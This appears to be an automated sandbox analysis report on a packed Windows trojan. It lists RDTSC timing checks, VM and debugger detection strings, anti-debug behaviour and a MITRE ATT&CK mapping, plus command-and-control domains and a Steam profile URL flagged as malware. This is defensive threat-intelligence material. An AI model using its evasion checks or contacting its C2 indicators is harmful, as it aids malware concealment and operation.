    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10338DE second address: 10338E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103328E second address: 10332BB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007FD8346DCB31h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 jo 00007FD8346DCB37h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1033424 second address: 103343C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB201h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10335EA second address: 10335F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10335F2 second address: 10335F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035141 second address: 103514C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103514C second address: 1035150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1035150 second address: 103517D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD8346DCB38h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1045E74 second address: 1045E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FD8346DB1F6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f jmp 00007FD8346DB203h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A87 second address: 1057A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A8B second address: 1057A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD8346DB1F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057A9B second address: 1057AA1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057AA1 second address: 1057AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1057AA7 second address: 1057AAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F25A second address: 105F25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F25E second address: 105F264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F264 second address: 105F276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FD8346DB1F6h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F538 second address: 105F561 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Dh 0x00000007 pushad 0x00000008 jc 00007FD8346DCB26h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jc 00007FD8346DCB26h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a pushad 0x0000001b push esi 0x0000001c pop esi 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F561 second address: 105F583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD8346DB1F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD8346DB203h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F583 second address: 105F587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F587 second address: 105F58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105F58B second address: 105F5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD8346DCB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD8346DCB2Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FF59 second address: 105FF71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DB202h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106449A second address: 10644A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10644A1 second address: 10644CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB207h 0x00000009 jnp 00007FD8346DB1F6h 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FD8346DB1F6h 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10644CD second address: 10644D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10644D1 second address: 10644DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10644DC second address: 1064513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD8346DCB37h 0x0000000d jmp 00007FD8346DCB2Bh 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FD8346DCB26h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1064513 second address: 106452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB204h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10690AC second address: 10690B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10690B2 second address: 10690B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10690B6 second address: 10690CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A83E second address: 106A873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB209h 0x00000007 jmp 00007FD8346DB200h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jg 00007FD8346DB1F6h 0x00000015 pop esi 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076616 second address: 1076635 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD8346DCB35h 0x00000008 jbe 00007FD8346DCB2Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10750ED second address: 1075106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DB205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086D16 second address: 1086D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086D1A second address: 1086D38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD8346DB205h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1086D38 second address: 1086D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DBF9 second address: F7DBFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E777 second address: 109E7AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007FD8346DCB2Ah 0x00000011 pop esi 0x00000012 jbe 00007FD8346DCB3Ch 0x00000018 pushad 0x00000019 jns 00007FD8346DCB26h 0x0000001f jl 00007FD8346DCB26h 0x00000025 popad 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E8D3 second address: 109E8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E8D9 second address: 109E8DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109E8DD second address: 109E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FD8346DB1F6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EE60 second address: 109EEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB38h 0x00000007 jmp 00007FD8346DCB38h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push edi 0x00000018 pop edi 0x00000019 jnc 00007FD8346DCB26h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EEA7 second address: 109EEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jo 00007FD8346DB200h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F41A second address: 109F41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109F41E second address: 109F422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A0E0E second address: 10A0E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A3B6C second address: 10A3B8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jg 00007FD8346DB1F6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD8346DB1FEh 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A84BB second address: 10A84C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80AED second address: 4D80B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bl 0x00000005 jmp 00007FD8346DB1FAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, dword ptr [eax+00000FDCh] 0x00000013 jmp 00007FD8346DB200h 0x00000018 test ecx, ecx 0x0000001a pushad 0x0000001b mov ecx, ebx 0x0000001d popad 0x0000001e jns 00007FD8346DB217h 0x00000024 pushad 0x00000025 mov edx, 70DDA268h 0x0000002a mov edx, 471E7D14h 0x0000002f popad 0x00000030 add eax, ecx 0x00000032 jmp 00007FD8346DB203h 0x00000037 mov eax, dword ptr [eax+00000860h] 0x0000003d jmp 00007FD8346DB206h 0x00000042 test eax, eax 0x00000044 jmp 00007FD8346DB200h 0x00000049 je 00007FD8A53913E5h 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FD8346DB1FAh 0x00000058 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B84 second address: 4D80B8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B8A second address: 4D80B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD8346DB1FDh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FB0AFC instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E03AD3 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1039F8E instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
    Source: C:\Users\user\Desktop\file.exe TID: 7344Thread sleep time: -30000s >= -30000sJump to behavior
    Source: file.exe, file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: file.exe, 00000003.00000002.1345090990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
    Source: file.exe, 00000003.00000002.1345090990.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345090990.0000000000AD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SICE
    Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00DE5BB0 LdrInitializeThunk,3_2_00DE5BB0

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: file.exeString found in binary or memory: licendfilteo.site
    Source: file.exeString found in binary or memory: clearancek.site
    Source: file.exeString found in binary or memory: bathdoomgaz.stor
    Source: file.exeString found in binary or memory: spirittunek.stor
    Source: file.exeString found in binary or memory: dissapoiznw.stor
    Source: file.exeString found in binary or memory: studennotediw.stor
    Source: file.exeString found in binary or memory: mobbipenju.stor
    Source: file.exeString found in binary or memory: eaglepawnoy.stor
    Source: file.exe, file.exe, 00000003.00000002.1345636481.0000000000F91000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: TProgram Manager
    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Process Injection
    24
    Virtualization/Sandbox Evasion
    OS Credential Dumping631
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory24
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager2
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
    Obfuscated Files or Information
    NTDS23
    System Information Discovery
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    file.exe42%ReversingLabsWin32.Trojan.Generic
    file.exe100%AviraTR/Crypt.ZPACK.Gen
    file.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=engl0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    104.102.49.254
    truefalse
      unknown
      sergei-esenin.com
      104.21.53.8
      truetrue
        unknown
        eaglepawnoy.store
        unknown
        unknownfalse
          unknown
          bathdoomgaz.store
          unknown
          unknownfalse
            unknown
            spirittunek.store
            unknown
            unknownfalse
              unknown
              licendfilteo.site
              unknown
              unknowntrue
                unknown
                studennotediw.store
                unknown
                unknownfalse
                  unknown
                  mobbipenju.store
                  unknown
                  unknownfalse
                    unknown
                    clearancek.site
                    unknown
                    unknowntrue
                      unknown
                      dissapoiznw.store
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        studennotediw.stortrue
                          unknown
                          spirittunek.stortrue
                            unknown
                            eaglepawnoy.stortrue
                              unknown
                              clearancek.sitetrue
                                unknown
                                mobbipenju.stortrue
                                  unknown
                                  https://steamcommunity.com/profiles/76561199724331900true
                                  • URL Reputation: malware
                                  unknown
                                  licendfilteo.sitetrue
                                    unknown
                                    bathdoomgaz.stortrue
                                      unknown
                                      dissapoiznw.stortrue
                                        unknown
                                        https://sergei-esenin.com/apitrue
                                          unknown
                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://steamcommunity.com/my/wishlist/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
